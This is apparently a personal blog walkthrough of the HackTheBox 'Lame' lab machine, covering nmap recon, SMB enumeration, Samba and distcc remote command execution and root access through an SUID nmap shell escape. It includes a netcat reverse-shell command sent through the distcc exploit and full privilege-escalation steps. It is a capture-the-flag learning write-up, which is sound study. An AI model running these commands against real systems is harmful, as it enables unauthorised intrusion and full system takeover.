HackTheBox - Lame Walkthrough

July 10, 2019

Lame

I decided to start HackTheBox from the beginning and do a writeup while doing every box. The first one in the list is Lame. An easy box based on Metasploitable. Hope those posts can help someone other than me, but in the end I’m doing them for learning/note taking - if you have any complaints/suggestions/questions - hit me at twitter.

1. Recon and Information gathering

Nmap

root@warmachine:/hackthebox/lame# nmap -sV -sC 10.10.10.3 -oN base_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 21:14 EEST
Nmap scan report for 10.10.10.3
Host is up (0.044s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.25
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d23h01m54s, deviation: 0s, median: -2d23h01m54s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-07-07T11:12:55-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.99 seconds

SERVICES

FTP

With my fist look at the nmap results I notice the vsftpd version - 2.3.4 - and I know I have “something” here :) Quick search with searchsploit yield results as I remember:

root@warmachine:/hackthebox/lame# searchsploit vsftpd
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                                      | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                                      | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                                      | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                                                                                    | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                              | exploits/unix/remote/17491.rb
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------

I’ll leave this for a minute and check the other services.

SMB

As nmap tells me I have smb ports open - 139 and 445. I’ll take a look at those after playing with the ftp service.

2. Gaining foothold/Exploiting

Now, the ftp service. That version of vsftpd is backdoored - https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html. Lets copy the script from the searchsploit result to my working directory:

root@warmachine:/hackthebox/lame# searchsploit -m exploits/unix/remote/17491.rb
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
      URL: https://www.exploit-db.com/exploits/17491
     Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators

Copied to: /hackthebox/lame/17491.rb

The script is for metasploit but since I have some far away plans of taking OSCP - I’ll do my best to skip using it (or at least skip it as a primary tool…). Looking throught the script it looks like I have to send a smiley face: :) on the USER input and… uh-oh… it errors out if there’s anonymous login enabled. Guess I can’t exploit that now. Also there are no files/folders in the anonymous ftp - what a let down :/. So I’ll check the smb then:

root@warmachine:/hackthebox/lame# smbclient -L 10.10.10.3
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

Mm now I have something more interesting. Lets check my permissions:

root@warmachine:/hackthebox/lame# smbmap -H 10.10.10.3
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.3...
[+] IP: 10.10.10.3:445	Name: 10.10.10.3                                        
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	tmp                                               	READ, WRITE
	opt                                               	NO ACCESS
	IPC$                                              	NO ACCESS
	ADMIN$                                            	NO ACCESS

Oh, look at that - I can read/write to tmp… but not that useful at the moment

root@warmachine:/hackthebox/lame# smbclient //10.10.10.3\\tmp
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul  7 18:48:37 2019
  ..                                 DR        0  Sun May 20 21:36:12 2012
  .ICE-unix                          DH        0  Sun Jul  7 18:10:18 2019
  .X11-unix                          DH        0  Sun Jul  7 18:10:42 2019
  .X0-lock                           HR       11  Sun Jul  7 18:10:42 2019
  5144.jsvc_up                        R        0  Sun Jul  7 18:11:24 2019

		7282168 blocks of size 1024. 5678792 blocks available
smb: \> 

Searching about smb version 3.0.20 I get an interesting result - CVE-2007-2447 - Samba “username map script” Command Execution. And since I want to skip the metasploit some googling leads me to this script https://gist.githubusercontent.com/joenorton8014/19aaa00e0088738fc429cff2669b9851/raw/6e1ae37e0061be103fd733b16266d26379a7f4ba/samba-usermap-exploit.py

Generating new payload for my host and substituting it in the script + installing pysmb with pip and executing… BAM! Got root..

Ncat: Connection from 10.10.10.3:55941.
id
uid=0(root) gid=0(root)

That was easy.. I’ll forget I have the shell and check if there’s something more.

Let’s enumerate some more and check all ports

root@warmachine:/hackthebox/lame# nmap -p- 10.10.10.3 -oN all_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 22:53 EEST
Nmap scan report for 10.10.10.3
Host is up (0.036s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Uh-oh distccd… Now that’s interesting. Googling around I found this: https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html and the nse script https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse :

root@warmachine:/hackthebox/lame# wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
--2019-07-10 23:05:45--  https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse
Resolving svn.nmap.org (svn.nmap.org)... 45.33.49.119, 2600:3c01::f03c:91ff:fe98:ff4e
Connecting to svn.nmap.org (svn.nmap.org)|45.33.49.119|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3519 (3.4K) [text/plain]
Saving to: ‘/usr/share/nmap/scripts/distcc-exec.nse’

/usr/share/nmap/scripts/distcc-exec.nse     100%[========================================================================================>]   3.44K  --.-KB/s    in 0s      

2019-07-10 23:05:46 (186 MB/s) - ‘/usr/share/nmap/scripts/distcc-exec.nse’ saved [3519/3519]

root@warmachine:/hackthebox/lame# 
root@warmachine:/hackthebox/lame# nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'"
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:06 EEST
Nmap scan report for 10.10.10.3
Host is up (0.040s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://distcc.github.io/security.html
|       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds

Finally - let’s get shell

root@warmachine:/hackthebox/lame# nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='/bin/nc 10.10.14.25 4747 -e /bin/sh'"
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:27 EEST


root@warmachine:/hackthebox/lame# nc -lvnp 4747
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4747
Ncat: Listening on 0.0.0.0:4747
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:34633.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

3. Enumerating the system

First thing - first: python -c 'import pty;pty.spawn("/bin/bash")' and then - LinEnum.sh

Interesting stuff:

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr

Whoa! that’s almost like metasploitable :D Oh, wait

daemon@lame:/tmp$ cat /root/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

not like, I guess…

I’ll play with the SUIDs - with the help of gtfobins - https://gtfobins.github.io

nmap SUID

daemon@lame:/tmp$ nmap --interactive
nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
sh-3.2# cat /root/root.txt
cat /root/root.txt
<...>

sh-3.2# cat /home/makis/user.txt
cat /home/makis/user.txt
<...>

For some reason I couldn’t make the mtr SUID work… it errors out? :/

That’s pretty much it… a lot of vulnerabilities and misconfigurations. LinEnum.sh showed more interesting stuff but looking at them I think they were “patched” for the sake of making the machine not that vulnerable.